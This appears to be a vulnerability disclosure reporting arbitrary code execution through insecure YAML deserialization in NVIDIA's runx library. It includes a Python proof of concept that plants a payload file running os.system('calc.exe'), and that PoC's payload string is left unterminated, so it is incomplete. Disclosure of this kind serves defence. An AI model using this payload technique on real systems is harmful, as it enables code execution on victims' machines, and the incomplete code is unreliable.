Deserialization of Untrusted Data in NVIDIA/runx

Reported on Dec 21st 2020


runx is a Deep Learning Experiment Management library by NVIDIA. This package was vulnerable to Arbitrary code execution via Insecure YAML deserialization due to the use of a known vulnerable function load() in yaml. <br> repo:

Proof of Concept

#!/usr/bin/env python3

import runx.utils as runx
import os

payload = '''
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('calc.exe')"

# create payload file in ~/.config/runx.yml
if not (os.path.isdir(os.environ['HOME'] + '/.config')):
    os.mkdir(os.environ['HOME'] + '/.config')
open(os.environ['HOME'] + '/.config/runx.yml', 'w+').write(payload)


print("pwned! 🏴")
  • pip3 install runx
  • python3